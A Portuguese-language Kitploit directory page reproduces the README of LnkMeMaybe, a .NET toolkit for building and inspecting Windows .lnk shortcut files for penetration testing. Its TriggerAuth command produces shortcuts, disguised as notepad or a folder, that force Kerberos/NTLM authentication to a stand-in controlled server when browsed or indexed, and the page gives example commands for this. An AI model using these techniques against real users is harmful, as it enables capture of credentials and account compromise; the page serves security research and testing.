Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
LnkMeMaybe — Ferramentas de criação e pesquisa de Lnk | Kitploit
Ferramentas/GitHubGitHub/trustedsec/lnkmemaybe
Geração de PayloadsExploraçãoForensia DigitalTestes de PenetraçãoEngenharia SocialAnálise de Binários
GitHubtrustedsec/lnkmemaybe

LnkMeMaybe

Ferramentas de criação e pesquisa de Lnk

Ver Repositório
1851114há 6 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Site
Compartilhar

LnkMeMaybe

Um kit de ferramentas .NET 8 para criar e analisar arquivos Windows Shell Link (.lnk). Inclui um construtor de linha de comando (LnkMeMaybe) e um editor gráfico (LnkUi). Destinado a pesquisa de segurança e testes de penetração.


Projetos

ProjetoDescrição
Lnk/Biblioteca principal. Analisa e gera o formato binário .lnk de acordo com a especificação MS-SHLLINK. LnkHandler é o ponto de entrada principal, compondo ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData e ExtraData.
LnkMeMaybe/Ferramenta CLI. Comandos para gerar uma variedade de arquivos .lnk. Utiliza o framework Titanis.Cli.
LnkUi/Editor desktop MVVM em Avalonia 11. Sete ViewModels encapsulam os componentes correspondentes da biblioteca Lnk. Útil para exploração e inspeção manual de arquivos .lnk.
LnkTests/Suíte MSTest. Amostras reais de arquivos .lnk são incorporadas como recursos. Abrange ShellLinkHeader e LinkInfo.

CLI — LnkMeMaybe

Parâmetros Comuns

Todos os comandos compartilham os seguintes parâmetros base (de BaseSavedCommand):

ParâmetroAliasObrigatórioDescrição
--OutputPathSimCaminho no sistema de arquivos para gravar o arquivo .lnk.
--OverwriteNãoPermite sobrescrever um arquivo existente em OutputPath.
--DisplayNameNãoTexto exibido ao passar o mouse sobre o atalho. Suporta \n para novas linhas.
--IconPath / -I-INãoCaminho para um .exe ou .dll a ser usado como ícone do atalho. Deve existir no sistema de destino.
--IconIndexNãoÍndice do recurso de ícone no arquivo especificado por --IconPath. Padrão: 0.

TriggerAuth (CVE-2026-25185)

Cria um .lnk que dispara autenticação Kerberos (com fallback para NTLM) para um servidor especificado. O .lnk não executa nada.

Cenários em que a autenticação é disparada:

  1. Um usuário navega até o compartilhamento que contém o .lnk — a conta do usuário realiza autenticação de saída.
  2. O .lnk é colocado em um local que a máquina está configurada para indexar — SearchProtocolHost autentica como SYSTEM.
  3. O MSSense está em execução e o local não é isento — MSSense.exe autentica como SYSTEM.

Parâmetros:

ParâmetroAliasObrigatórioDescrição
--FakePath / -F-FSimCaminho exibido como destino nas propriedades do .lnk.
--Server / -S-SSimHostname, IP ou caminho UNC do servidor para o qual a autenticação será enviada. Acrescenta IPC$ se nenhum compartilhamento for especificado.
--DarwinNãoIdentificador Darwin armazenado no .lnk. Pode ser qualquer valor. Padrão: unset.

Exemplos:

# Send authentication to \\controlled.example.org\IPC$ while posing as notepad
LnkMeMaybe.exe TriggerAuth -F C:\Windows\notepad.exe -S \\controlled.example.org -DisplayName notepad.exe -I C:\Windows\notepad.exe -OutputPath notepad.lnk

# Send authentication to a specific share path while posing as a folder shortcut
LnkMeMaybe.exe TriggerAuth -F C:\Users\Public -S \\controlled.example.org\validshare\somefile.txt -DisplayName C:\Users\Public -I C:\Windows\system32\imageres.dll -IconIndex 3 -OutputPath Public.lnk

WebShortcut

Cria um arquivo .lnk que aponta para uma URL web. Normalmente, o Windows cria um arquivo .url para atalhos da web; este comando produz um .lnk em vez disso.

Parâmetros:

ParâmetroObrigatórioDescrição
--UrlSimA URL para a qual o atalho deve apontar. Deve ser uma URI absoluta bem formada.

Exemplo:

LnkMeMaybe.exe WebShortcut -Url https://example.org -OutputPath example.lnk

LocalShortcut

Cria um atalho padrão do Windows para um arquivo ou pasta local. O caminho de destino é armazenado como uma lista de IDs de itens de shell (PIDL) — o formato nativo que o Windows usa para atalhos do sistema de arquivos.

Parâmetros:

ParâmetroAliasObrigatórioDescrição
--TargetPathSimCaminho absoluto para o arquivo ou pasta de destino.
--ArgumentsNãoArgumentos de linha de comando a serem passados ao destino.
--WorkingDirectory-WNãoDiretório de trabalho para o processo de destino.
--RunAsAdminNãoSolicita elevação de UAC quando o atalho é iniciado.
--ShowCommandNãoEstado da janela ao iniciar: Normal, Maximized ou Minimized.

Exemplos:

# Create a shortcut to Notepad
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --OutputPath notepad.lnk

# Shortcut with arguments and a custom icon
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --Arguments myfile.txt --WorkingDirectory C:\Users\Public --OutputPath notepad.lnk -I C:\Windows\notepad.exe

# Shortcut that opens maximised and requests elevation
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\System32\cmd.exe --ShowCommand Maximized --RunAsAdmin --OutputPath cmd_admin.lnk

EnvShortcut

Cria um .lnk em que o caminho de destino é armazenado como uma string expansível de variável de ambiente (EnvironmentVariableDataBlock). Este é o formato que o Windows usa para atalhos para executáveis do sistema (ex.: %SystemRoot%\system32\notepad.exe). As variáveis são expandidas no momento da execução, tornando o atalho portátil entre instalações do Windows.

Parâmetros:

ParâmetroAliasObrigatórioDescrição
--TargetPathSimCaminho de destino; pode incluir variáveis de ambiente como %SystemRoot% ou %USERPROFILE%.
--ArgumentsNãoArgumentos de linha de comando a serem passados ao destino.
--WorkingDirectory-WNãoDiretório de trabalho para o processo de destino.
--RunAsAdminNãoSolicita elevação de UAC quando o atalho é iniciado.
--ShowCommandNãoEstado da janela ao iniciar: Normal, Maximized ou Minimized.

Exemplos:

# Shortcut to Notepad using an environment variable path
LnkMeMaybe.exe EnvShortcut --TargetPath "%SystemRoot%\system32\notepad.exe" --OutputPath notepad.lnk

# Shortcut to a user-profile app with arguments
LnkMeMaybe.exe EnvShortcut --TargetPath "%LOCALAPPDATA%\MyApp\app.exe" --Arguments "--config default" --WorkingDirectory "%USERPROFILE%" --OutputPath myapp.lnk

Compilação

# Build (debug)
dotnet build Lnk.sln

# Build (release, core projects only)
dotnet build -c Release build.slnf

# Run all tests
dotnet test

# Run a specific test class
dotnet test --filter "ClassName=lnkHeader"

# Publish self-contained single-file executable (Windows x64)
dotnet publish -c Release -r win-x64 -p:PublishSingleFile=true -p:DebugType=None --self-contained true --output LnkMeMaybeWindows LnkMeMaybe/LnkMeMaybe.csproj

Lançamentos

Binários pré-compilados para Windows, Linux e macOS (x64 e arm64) estão disponíveis na página de Lançamentos.

Cada lançamento inclui compilações independentes (standalone) (sem necessidade de runtime .NET) e dependentes de framework (requerem o runtime .NET 8) para LnkMeMaybe e LnkUi.

Divulgação de Uso de IA

Sistemas de IA foram usados para as seguintes tarefas:

  • Revisão da qualidade do código
  • Geração do Readme
  • Ações de fluxo de trabalho do GitHub

Todo o restante do código presente neste repositório foi criado e revisado por humanos.

Baixar ferramenta